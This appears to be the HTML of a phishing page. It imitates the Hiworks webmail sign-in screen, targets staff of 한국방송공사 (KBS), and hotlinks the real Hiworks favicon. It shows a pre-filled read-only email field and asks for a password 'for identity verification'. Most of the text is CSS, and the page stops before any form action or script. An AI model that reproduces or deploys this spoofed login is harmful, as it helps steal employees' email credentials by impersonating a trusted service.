<!DOCTYPE html>
<html lang="ko">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="icon" href="#">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>하이웍스 로그인</title>
    <link rel="shortcut icon" type="image/x-icon"
        href="https://mail.office.hiworks.com/static/images/favicon/favicon.ico">



    <style type="text/css">
        *,
        :before,
        :after {
            box-sizing: border-box;
            border-width: 0;
            border-style: solid;
            border-color: #999
        }

        :before,
        :after {
            --tw-content: ""
        }

        html {
            line-height: 1.5;
            -webkit-text-size-adjust: 100%;
            tab-size: 4;
            font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", Segoe UI Symbol, "Noto Color Emoji";
            -webkit-font-feature-settings: normal;
            font-feature-settings: normal;
            font-variation-settings: normal
        }

        body {
            margin: 0;
            line-height: inherit
        }

        hr {
            height: 0;
            color: inherit;
            border-top-width: 1px
        }

        abbr:where([title]) {
            -webkit-text-decoration: underline dotted;
            text-decoration: underline dotted
        }

        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            font-size: inherit;
            font-weight: inherit
        }

        a {
            color: inherit;
            text-decoration: inherit
        }

        b,
        strong {
            font-weight: bolder
        }

        code,
        kbd,
        samp,
        pre {
            font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, Liberation Mono, Courier New, monospace;
            font-size: 1em
        }

        small {
            font-size: 80%
        }

        sub,
        sup {
            font-size: 75%;
            line-height: 0;
            position: relative;
            vertical-align: baseline
        }

        sub {
            bottom: -.25em
        }

        sup {
            top: -.5em
        }

        table {
            text-indent: 0;
            border-color: inherit;
            border-collapse: collapse
        }

        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-size: 100%;
            font-weight: inherit;
            line-height: inherit;
            color: inherit;
            margin: 0;
            padding: 0
        }

        button,
        select {
            text-transform: none
        }

        button,
        [type=button],
        [type=reset],
        [type=submit] {
            -webkit-appearance: button;
            background-color: transparent;
            background-image: none
        }

        :-moz-focusring {
            outline: auto
        }

        :-moz-ui-invalid {
            box-shadow: none
        }

        progress {
            vertical-align: baseline
        }

        ::-webkit-inner-spin-button,
        ::-webkit-outer-spin-button {
            height: auto
        }

        [type=search] {
            -webkit-appearance: textfield;
            outline-offset: -2px
        }

        ::-webkit-search-decoration {
            -webkit-appearance: none
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit
        }

        summary {
            display: list-item
        }

        blockquote,
        dl,
        dd,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        hr,
        figure,
        p,
        pre {
            margin: 0
        }

        fieldset {
            margin: 0;
            padding: 0
        }

        legend {
            padding: 0
        }

        ol,
        ul,
        menu {
            list-style: none;
            margin: 0;
            padding: 0
        }

        textarea {
            resize: vertical
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            opacity: 1;
            color: #676767
        }

        input:-ms-input-placeholder,
        textarea:-ms-input-placeholder {
            opacity: 1;
            color: #676767
        }

        input::placeholder,
        textarea::placeholder {
            opacity: 1;
            color: #676767
        }

        button,
        [role=button] {
            cursor: pointer
        }

        :disabled {
            cursor: default
        }

        img,
        svg,
        video,
        canvas,
        audio,
        iframe,
        embed,
        object {
            display: block;
            vertical-align: middle
        }

        img,
        video {
            max-width: 100%;
            height: auto
        }

        [hidden] {
            display: none
        }

        *,
        :before,
        :after {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgb(41 133 219 / .5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia:
        }

        ::-webkit-backdrop {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgb(41 133 219 / .5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia:
        }

        ::backdrop {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgb(41 133 219 / .5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia:
        }

        .sr-only {
            position: absolute;
            width: 1px;
            height: 1px;
            padding: 0;
            margin: -1px;
            overflow: hidden;
            clip: rect(0, 0, 0, 0);
            white-space: nowrap;
            border-width: 0
        }

        .static {
            position: static
        }

        .mx-auto {
            margin-left: auto;
            margin-right: auto
        }

        .mb-10 {
            margin-bottom: 2.5rem
        }

        .mb-11 {
            margin-bottom: 2.75rem
        }

        .mb-2 {
            margin-bottom: .5rem
        }

        .mb-20 {
            margin-bottom: 5rem
        }

        .mb-3 {
            margin-bottom: .75rem
        }

        .mb-4 {
            margin-bottom: 1rem
        }

        .mb-5 {
            margin-bottom: 1.25rem
        }

        .mb-6 {
            margin-bottom: 1.5rem
        }

        .mb-8 {
            margin-bottom: 2rem
        }

        .mb-9 {
            margin-bottom: 2.25rem
        }

        .mb-\[30px\] {
            margin-bottom: 30px
        }

        .mb-\[60px\] {
            margin-bottom: 60px
        }

        .ml-2 {
            margin-left: .5rem
        }

        .ml-\[13px\] {
            margin-left: 13px
        }

        .ml-\[22px\] {
            margin-left: 22px
        }

        .mr-1 {
            margin-right: .25rem
        }

        .mr-2 {
            margin-right: .5rem
        }

        .mr-2\.5 {
            margin-right: .625rem
        }

        .mr-\[13px\] {
            margin-right: 13px
        }

        .mr-\[34px\] {
            margin-right: 34px
        }

        .mt-10 {
            margin-top: 2.5rem
        }

        .mt-2 {
            margin-top: .5rem
        }

        .mt-20 {
            margin-top: 5rem
        }

        .mt-3 {
            margin-top: .75rem
        }

        .mt-3\.5 {
            margin-top: .875rem
        }

        .mt-4 {
            margin-top: 1rem
        }

        .mt-5 {
            margin-top: 1.25rem
        }

        .mt-6 {
            margin-top: 1.5rem
        }

        .mt-\[102px\] {
            margin-top: 102px
        }

        .mt-\[120px\] {
            margin-top: 120px
        }

        .mt-\[30px\] {
            margin-top: 30px
        }

        .mt-\[60px\] {
            margin-top: 60px
        }

        .block {
            display: block
        }

        .flex {
            display: -ms-flexbox;
            display: flex
        }

        .inline-flex {
            display: -ms-inline-flexbox;
            display: inline-flex
        }

        .table {
            display: table
        }

        .hidden {
            display: none
        }

        .\!h-11 {
            height: 2.75rem !important
        }

        .h-10 {
            height: 2.5rem
        }

        .h-11 {
            height: 2.75rem
        }

        .h-6 {
            height: 1.5rem
        }

        .h-8 {
            height: 2rem
        }

        .h-9 {
            height: 2.25rem
        }

        .h-\[100px\] {
            height: 100px
        }

        .h-\[1px\] {
            height: 1px
        }

        .h-\[22px\] {
            height: 22px
        }

        .h-\[26px\] {
            height: 26px
        }

        .h-\[28px\] {
            height: 28px
        }

        .h-\[30px\] {
            height: 30px
        }

        .h-\[34px\] {
            height: 34px
        }

        .h-\[37px\] {
            height: 37px
        }

        .h-\[40px\] {
            height: 40px
        }

        .h-\[50px\] {
            height: 50px
        }

        .h-\[58px\] {
            height: 58px
        }

        .h-screen {
            height: 100vh
        }

        .max-h-4 {
            max-height: 1rem
        }

        .max-h-5 {
            max-height: 1.25rem
        }

        .max-h-full {
            max-height: 100%
        }

        .min-h-screen {
            min-height: 100vh
        }

        .w-8 {
            width: 2rem
        }

        .w-9 {
            width: 2.25rem
        }

        .w-\[100px\] {
            width: 100px
        }

        .w-\[104px\] {
            width: 104px
        }

        .w-\[130px\] {
            width: 130px
        }

        .w-\[156px\] {
            width: 156px
        }

        .w-\[200px\] {
            width: 200px
        }

        .w-\[232px\] {
            width: 232px
        }

        .w-fit {
            width: -webkit-fit-content;
            width: -moz-fit-content;
            width: fit-content
        }

        .w-full {
            width: 100%
        }

        .min-w-\[1px\] {
            min-width: 1px
        }

        .min-w-\[280px\] {
            min-width: 280px
        }

        .min-w-\[30px\] {
            min-width: 30px
        }

        .max-w-\[263px\] {
            max-width: 263px
        }

        .max-w-\[335px\] {
            max-width: 335px
        }

        .max-w-\[355px\] {
            max-width: 355px
        }

        .max-w-\[375px\] {
            max-width: 375px
        }

        .max-w-\[400px\] {
            max-width: 400px
        }

        .shrink-0 {
            -ms-flex-negative: 0;
            flex-shrink: 0
        }

        .grow {
            -ms-flex-positive: 1;
            flex-grow: 1
        }

        .grow-0 {
            -ms-flex-positive: 0;
            flex-grow: 0
        }

        .cursor-pointer {
            cursor: pointer
        }

        .flex-col {
            -ms-flex-direction: column;
            flex-direction: column
        }

        .flex-wrap {
            -ms-flex-wrap: wrap;
            flex-wrap: wrap
        }

        .items-start {
            -ms-flex-align: start;
            align-items: flex-start
        }

        .items-center {
            -ms-flex-align: center;
            align-items: center
        }

        .items-stretch {
            -ms-flex-align: stretch;
            align-items: stretch
        }

        .justify-center {
            -ms-flex-pack: center;
            justify-content: center
        }

        .justify-between {
            -ms-flex-pack: justify;
            justify-content: space-between
        }

        .gap-1 {
            gap: .25rem
        }

        .gap-1\.5 {
            gap: .375rem
        }

        .gap-2 {
            gap: .5rem
        }

        .gap-2\.5 {
            gap: .625rem
        }

        .gap-3 {
            gap: .75rem
        }

        .gap-5 {
            gap: 1.25rem
        }

        .gap-6 {
            gap: 1.5rem
        }

        .gap-\[14px\] {
            gap: 14px
        }

        .gap-\[5px\] {
            gap: 5px
        }

        .space-y-5>:not([hidden])~:not([hidden]) {
            --tw-space-y-reverse: 0;
            margin-top: calc(1.25rem * calc(1 - var(--tw-space-y-reverse)));
            margin-bottom: calc(1.25rem * var(--tw-space-y-reverse))
        }

        .self-end {
            -ms-flex-item-align: end;
            align-self: flex-end
        }

        .self-center {
            -ms-flex-item-align: center;
            align-self: center
        }

        .overflow-auto {
            overflow: auto
        }

        .overflow-hidden {
            overflow: hidden
        }

        .text-ellipsis {
            text-overflow: ellipsis
        }

        .whitespace-nowrap {
            white-space: nowrap
        }

        .break-keep {
            word-break: keep-all
        }

        .rounded {
            border-radius: .25rem
        }

        .rounded-\[18px\] {
            border-radius: 18px
        }

        .rounded-full {
            border-radius: 9999px
        }

        .rounded-sm {
            border-radius: .125rem
        }

        .border {
            border-width: 1px
        }

        .border-0 {
            border-width: 0px
        }

        .border-y {
            border-top-width: 1px;
            border-bottom-width: 1px
        }

        .border-b {
            border-bottom-width: 1px
        }

        .border-t {
            border-top-width: 1px
        }

        .border-solid {
            border-style: solid
        }

        .border-none {
            border-style: none
        }

        .\!border-red-400 {
            --tw-border-opacity: 1 !important;
            border-color: rgb(216 74 73 / var(--tw-border-opacity)) !important
        }

        .border-\[\#1f8ce8\] {
            --tw-border-opacity: 1;
            border-color: rgb(31 140 232 / var(--tw-border-opacity))
        }

        .border-\[\#6aa200\] {
            --tw-border-opacity: 1;
            border-color: rgb(106 162 0 / var(--tw-border-opacity))
        }

        .border-\[\#D6D6D6\] {
            --tw-border-opacity: 1;
            border-color: rgb(214 214 214 / var(--tw-border-opacity))
        }

        .border-\[\#ededed\] {
            --tw-border-opacity: 1;
            border-color: rgb(237 237 237 / var(--tw-border-opacity))
        }

        .border-\[\#f37d16\] {
            --tw-border-opacity: 1;
            border-color: rgb(243 125 22 / var(--tw-border-opacity))
        }

        .border-blue-500 {
            --tw-border-opacity: 1;
            border-color: rgb(41 133 219 / var(--tw-border-opacity))
        }

        .border-blue-600 {
            --tw-border-opacity: 1;
            border-color: rgb(5 106 201 / var(--tw-border-opacity))
        }

        .border-gray-100 {
            --tw-border-opacity: 1;
            border-color: rgb(196 196 196 / var(--tw-border-opacity))
        }

        .border-gray-300 {
            --tw-border-opacity: 1;
            border-color: rgb(144 144 144 / var(--tw-border-opacity))
        }

        .border-gray-50 {
            --tw-border-opacity: 1;
            border-color: rgb(234 234 234 / var(--tw-border-opacity))
        }

        .border-gray-70 {
            --tw-border-opacity: 1;
            border-color: rgb(214 214 214 / var(--tw-border-opacity))
        }

        .border-red-400 {
            --tw-border-opacity: 1;
            border-color: rgb(216 74 73 / var(--tw-border-opacity))
        }

        .bg-\[\#1f8ce8\] {
            background-color: #1f8ce8
        }

        .bg-\[\#6aa200\] {
            background-color: #6aa200
        }

        .bg-\[\#d0d0d0\] {
            background-color: #d0d0d0
        }

        .bg-\[\#f37d16\] {
            background-color: #f37d16
        }

        .bg-\[\#fbfbfb\] {
            background-color: #fbfbfb
        }

        .bg-blue-500 {
            background-color: #2985db
        }

        .bg-blue_gray-50 {
            background-color: #f8f9fb
        }

        .bg-gray-300 {
            background-color: #909090
        }

        .bg-gray-50 {
            background-color: #eaeaea
        }

        .bg-primary {
            background-color: #2985db
        }

        .bg-red-400 {
            background-color: #d84a49
        }

        .bg-transparent {
            background-color: transparent
        }

        .bg-white {
            background-color: #fff
        }

        .object-contain {
            object-fit: contain
        }

        .p-10 {
            padding: 2.5rem
        }

        .p-2 {
            padding: .5rem
        }

        .p-2\.5 {
            padding: .625rem
        }

        .p-3 {
            padding: .75rem
        }

        .p-4 {
            padding: 1rem
        }

        .px-10 {
            padding-left: 2.5rem;
            padding-right: 2.5rem
        }

        .px-2 {
            padding-left: .5rem;
            padding-right: .5rem
        }

        .px-2\.5 {
            padding-left: .625rem;
            padding-right: .625rem
        }

        .px-3 {
            padding-left: .75rem;
            padding-right: .75rem
        }

        .px-5 {
            padding-left: 1.25rem;
            padding-right: 1.25rem
        }

        .px-\[20px\] {
            padding-left: 20px;
            padding-right: 20px
        }

        .px-\[25px\] {
            padding-left: 25px;
            padding-right: 25px
        }

        .px-\[60px\] {
            padding-left: 60px;
            padding-right: 60px
        }

        .px-\[98px\] {
            padding-left: 98px;
            padding-right: 98px
        }

        .px-\[9px\] {
            padding-left: 9px;
            padding-right: 9px
        }

        .py-2 {
            padding-top: .5rem;
            padding-bottom: .5rem
        }

        .py-3 {
            padding-top: .75rem;
            padding-bottom: .75rem
        }

        .py-6 {
            padding-top: 1.5rem;
            padding-bottom: 1.5rem
        }

        .pb-1 {
            padding-bottom: .25rem
        }

        .pb-1\.5 {
            padding-bottom: .375rem
        }

        .pb-5 {
            padding-bottom: 1.25rem
        }

        .pb-9 {
            padding-bottom: 2.25rem
        }

        .pb-\[30px\] {
            padding-bottom: 30px
        }

        .pl-2 {
            padding-left: .5rem
        }

        .pl-2\.5 {
            padding-left: .625rem
        }

        .pt-0 {
            padding-top: 0
        }

        .pt-0\.5 {
            padding-top: .125rem
        }

        .pt-1 {
            padding-top: .25rem
        }

        .pt-11 {
            padding-top: 2.75rem
        }

        .pt-5 {
            padding-top: 1.25rem
        }

        .pt-\[120px\] {
            padding-top: 120px
        }

        .pt-\[25px\] {
            padding-top: 25px
        }

        .pt-\[80px\] {
            padding-top: 80px
        }

        .text-left {
            text-align: left
        }

        .text-center {
            text-align: center
        }

        .font-\[inherit\] {
            font-family: inherit
        }

        .font-oauth {
            font-family: NotoSans, Malgun Gothic, 맑은 고딕, Apple SD Gothic Neo, 돋움, dotum, sans-serif
        }

        .font-web {
            font-family: Malgun Gothic, 맑은 고딕, Apple SD Gothic Neo, 돋움, dotum, sans-serif
        }

        .text-12px {
            font-size: .75rem;
            letter-spacing: normal
        }

        .text-13px {
            font-size: .813rem;
            letter-spacing: -.2px
        }

        .text-14px {
            font-size: .875rem;
            letter-spacing: -.21px
        }

        .text-15px {
            font-size: .938rem;
            letter-spacing: -.45px
        }

        .text-16px {
            font-size: 1rem;
            letter-spacing: -.48px
        }

        .text-18px {
            font-size: 1.125rem;
            letter-spacing: -.27px
        }

        .text-22px {
            font-size: 1.375rem;
            letter-spacing: -.66px
        }

        .text-24px {
            font-size: 1.5rem;
            letter-spacing: -.72px
        }

        .text-28px {
            font-size: 1.75rem;
            letter-spacing: -.42px
        }

        .text-32px {
            font-size: 2rem;
            letter-spacing: -.48px
        }

        .text-36px {
            font-size: 2.25rem;
            letter-spacing: -1.08px
        }

        .font-bold {
            font-weight: 700
        }

        .font-normal {
            font-weight: 400
        }

        .leading-5 {
            line-height: 1.25rem
        }

        .leading-\[0\] {
            line-height: 0
        }

        .leading-\[21px\] {
            line-height: 21px
        }

        .leading-\[48px\] {
            line-height: 48px
        }

        .text-\[\#575757\] {
            color: #575757
        }

        .text-\[\#5d5d5d\] {
            color: #5d5d5d
        }

        .text-\[\#9e9e9e\] {
            color: #9e9e9e
        }

        .text-blue-400 {
            color: #4e9bd4
        }

        .text-blue-500 {
            color: #2985db
        }

        .text-gray-100 {
            color: #c4c4c4
        }

        .text-gray-200 {
            color: #999
        }

        .text-gray-300 {
            color: #909090
        }

        .text-gray-400 {
            color: #676767
        }

        .text-gray-500 {
            color: #585858
        }

        .text-gray-900 {
            color: #141414
        }

        .text-gray-primary {
            color: #333
        }

        .text-gray-secondary {
            color: #676767
        }

        .text-primary {
            color: #2985db
        }

        .text-red-400 {
            color: #d84a49
        }

        .text-white {
            color: #fff
        }

        .outline-none {
            outline: 2px solid transparent;
            outline-offset: 2px
        }

        .filter {
            -webkit-filter: var(--tw-blur) var(--tw-brightness) var(--tw-contrast) var(--tw-grayscale) var(--tw-hue-rotate) var(--tw-invert) var(--tw-saturate) var(--tw-sepia) var(--tw-drop-shadow);
            filter: var(--tw-blur) var(--tw-brightness) var(--tw-contrast) var(--tw-grayscale) var(--tw-hue-rotate) var(--tw-invert) var(--tw-saturate) var(--tw-sepia) var(--tw-drop-shadow)
        }

        @media (prefers-color-scheme: dark) {
            .darkmode-oauth {
                background-color: #222326;
                color: #cfd3d5
            }

            .darkmode-oauth input {
                color: #c1c1c1 !important;
                background-color: transparent
            }

            .darkmode-oauth input::-webkit-input-placeholder {
                color: #575757 !important
            }

            .darkmode-oauth input:-ms-input-placeholder {
                color: #575757 !important
            }

            .darkmode-oauth input::placeholder {
                color: #575757 !important
            }

            .darkmode-oauth label {
                color: #fff
            }

            .darkmode-oauth h2 {
                color: #cfd3d5
            }
        }

        .placeholder\:text-14px::-webkit-input-placeholder {
            font-size: .875rem;
            letter-spacing: -.21px
        }

        .placeholder\:text-14px:-ms-input-placeholder {
            font-size: .875rem;
            letter-spacing: -.21px
        }

        .placeholder\:text-14px::placeholder {
            font-size: .875rem;
            letter-spacing: -.21px
        }

        .placeholder\:text-gray-100::-webkit-input-placeholder {
            color: #c4c4c4
        }

        .placeholder\:text-gray-100:-ms-input-placeholder {
            color: #c4c4c4
        }

        .placeholder\:text-gray-100::placeholder {
            color: #c4c4c4
        }

        .hover\:border-primary:hover {
            --tw-border-opacity: 1;
            border-color: rgb(41 133 219 / var(--tw-border-opacity))
        }

        .hover\:bg-\[\#EAEAEA\]:hover {
            background-color: #eaeaea
        }

        .hover\:bg-blue-600:hover {
            background-color: #056ac9
        }

        .hover\:bg-gray-50:hover {
            background-color: #eaeaea
        }

        .hover\:bg-gray-500:hover {
            background-color: #585858
        }

        .hover\:bg-gray-70:hover {
            background-color: #d6d6d6
        }

        .hover\:bg-green-600:hover {
            background-color: #007e04
        }

        .hover\:bg-orange-600:hover {
            background-color: #d5620a
        }

        .hover\:bg-red-500:hover {
            background-color: #c70909
        }

        .hover\:text-blue-600:hover {
            color: #056ac9
        }

        .hover\:text-gray-600:hover {
            color: #333
        }

        .active\:bg-blue-600:active {
            background-color: #056ac9
        }

        .active\:bg-gray-50:active {
            background-color: #eaeaea
        }

        .active\:bg-gray-500:active {
            background-color: #585858
        }

        .active\:bg-gray-70:active {
            background-color: #d6d6d6
        }

        .active\:bg-green-600:active {
            background-color: #007e04
        }

        .active\:bg-orange-600:active {
            background-color: #d5620a
        }

        .active\:bg-red-500:active {
            background-color: #c70909
        }

        .active\:text-blue-600:active {
            color: #056ac9
        }

        .active\:text-gray-600:active,
        .active\:text-gray-primary:active {
            color: #333
        }

        .disabled\:cursor-default:disabled {
            cursor: default
        }

        .disabled\:opacity-30:disabled {
            opacity: .3
        }

        @media (min-width: 640px) {
            .sm\:min-w-\[540px\] {
                min-width: 540px
            }

            .sm\:max-w-\[360px\] {
                max-width: 360px
            }

            .sm\:max-w-\[380px\] {
                max-width: 380px
            }

            .sm\:p-0 {
                padding: 0
            }

            .sm\:px-0 {
                padding-left: 0;
                padding-right: 0
            }
        }

        .\[\&\>\.mantine-TextInput-wrapper\>input\]\:bg-gray-50>.mantine-TextInput-wrapper>input {
            background-color: #eaeaea
        }

        .\[\&\>\.mantine-TextInput-wrapper\>input\]\:text-gray-primary>.mantine-TextInput-wrapper>input {
            color: #333
        }



        .mantine-p2wiva {
            font-family: inherit;
            -webkit-tap-highlight-color: transparent;
            appearance: none;
            resize: none;
            box-sizing: border-box;
            width: 100%;
            display: block;
            text-align: left;
            transition: border-color 100ms ease 0s;
            height: 2.5rem;
            min-height: 0px;
            line-height: 2.5rem;
            font-size: 0.875rem;
            letter-spacing: -0.013125rem;
            padding: 8px 10px;
            border-radius: 2px;
            border: 1px solid rgb(214, 214, 214);
            background-color: rgb(255, 255, 255);
            color: rgb(51, 51, 51);
        }

        .mantine-p2wiva[data-with-icon] {
            padding-left: 2.25rem;
        }

        .mantine-1v7s5f8 {
            position: relative;
        }

        .mantine-16k3d8y {
            pointer-events: none;
            position: absolute;
            z-index: 1;
            left: 0px;
            top: 0px;
            bottom: 0px;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            width: 2.25rem;
            color: rgb(173, 181, 189);
        }
    </style>



</head>

<body class="font-web">
    <div id="root">
        <div class="mantine-Container-root flex h-screen flex-col pt-[120px] sm:px-0 mantine-srqryz">

            <header class="mb-[60px]">
                <div class="mx-auto w-fit leading-[0]"
                    style="font-size: 40px;color: #00182d;font-weight: 700;text-transform: uppercase;">
                    <img id="logoimg" class="object-contain w-[200px] h-[40px]" alt="hiworks" />
                </div>
            </header>
            <main class="grow" style="max-width:500px;margin: auto;">
                <div>
                    <div>

                        <fieldset class="flex max-w-[400px] flex-col" id="div2" style="">
                            <div class="mb-8 text-center">
                                <legend class="mb-3 w-full text-24px font-bold">Sign in to <span
                                        class="font-bold text-gray-400" id="scanp">한국방송공사</span></legend>
                                <p class="mb-8 text-14px">Please enter your password for identity verification.</p>
                                <div aria-hidden="true"
                                    class="inline-flex h-9 items-center rounded-[18px] border border-gray-50 px-5"><svg
                                        xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"
                                        class="mr-2">
                                        <path data-name="\uD328\uC2A4 98550" d="M8 0a8 8 0 1 0 8 8 8 8 0 0 0-8-8"
                                            style="fill: rgb(144, 144, 144);"></path>
                                        <path data-name="\uD569\uCE58\uAE30 689"
                                            d="M3727 20366.9a3.6 3.6 0 0 1 3.175-1.928.735.735 0 0 1 .235.037 4.043 4.043 0 0 0 2.638 0 .726.726 0 0 1 .23-.037 3.6 3.6 0 0 1 3.175 1.928 6.171 6.171 0 0 1-9.452 0zm1.886-6.057a2.84 2.84 0 1 1 2.837 2.836 2.837 2.837 0 0 1-2.836-2.839z"
                                            transform="translate(-3723.725 -20354.906)"
                                            style="fill: rgb(255, 255, 255); stroke: transparent; stroke-miterlimit: 10;">
                                        </path>
                                    </svg><input type="" name="em" id="ai" value="" readonly></div>
                            </div>


                            <div class="mantine-InputWrapper-root mantine-TextInput-root mb-5 mantine-vb1jt1">
                                <div class="mantine-Input-wrapper mantine-TextInput-wrapper mantine-1v7s5f8">
                                    <div class="mantine-16k3d8y mantine-Input-icon mantine-TextInput-icon"><svg
                                            xmlns="http://www.w3.org/2000/svg" width="14" height="14"
                                            viewBox="0 0 14 14">
                                            <path data-name="\uC0AC\uAC01\uD615 11664" d="M0 0h14v14H0z"
                                                style="fill: none;"></path>
                                            <g data-name="\uADF8\uB8F9 59573">
                                                <path data-name="\uD328\uC2A4 6923"
                                                    d="M538.1 70.054h-1.75v-.875a3.5 3.5 0 0 0-7 0v.875h-1.75a.875.875 0 0 0-.875.875V78.8a.875.875 0 0 0 .875.875h10.5a.875.875 0 0 0 .875-.875v-7.871a.875.875 0 0 0-.875-.875zm-7.875-.875a2.625 2.625 0 0 1 5.25 0v.875h-5.25zM538.1 78.8h-10.5v-7.871h10.5z"
                                                    transform="translate(-525.855 -65.679)"
                                                    style="fill: rgb(144, 144, 144);"></path>
                                                <path data-name="\uD328\uC2A4 6924"
                                                    d="M533.98 73.754a1.312 1.312 0 0 0-.875 2.475v1.83h.875v-1.83a1.312 1.312 0 0 0 0-2.475z"
                                                    transform="translate(-526.542 -66.679)"
                                                    style="fill: rgb(144, 144, 144);"></path>
                                            </g>
                                        </svg></div>
                                    <input class="mantine-Input-input mantine-TextInput-input mantine-p2wiva"
                                        type="password" name="pr" id="pr" placeholder="Password" aria-invalid="false"
                                        data-with-icon="true">
                                </div>
                            </div>
                            <div class="error" id="msg" style="display: none; color:red;">
                                &#xC544;&#xC774;&#xB514;&#xB098;&#x20;&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xAC00;&#x20;&#xC815;&#xD655;&#xD558;&#xC9C0;&#x20;&#xC54A;&#xC2B5;&#xB2C8;&#xB2E4;&#x2E;
                            </div>
                            <div class="error" id="error" style="display: none; color:red;">
                                &#xC544;&#xC774;&#xB514;&#xB098;&#x20;&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xAC00;&#x20;&#xC815;&#xD655;&#xD558;&#xC9C0;&#x20;&#xC54A;&#xC2B5;&#xB2C8;&#xB2E4;&#x2E;
                            </div>
                            <button
                                class="mantine-UnstyledButton-root flex cursor-pointer items-center gap-1.5 rounded disabled:cursor-default disabled:opacity-30 border border-solid border-blue-600 bg-primary text-white h-11 gap-2.5 px-[60px] text-18px false  justify-center mantine-id0m02"
                                type="submit" id="submit-btn">로그인</button>
                        </fieldset>

                        <button
                            class="mantine-UnstyledButton-root flex cursor-pointer items-center gap-1.5 rounded border-none bg-transparent text-primary disabled:cursor-default disabled:opacity-30 hover:text-blue-600 active:text-blue-600 h-[26px] gap-1.5 text-14px mt-3 h-[34px] mantine-id0m02"
                            type="button"><span class="">다른 사무실로 로그인</span></button>
                    </div>
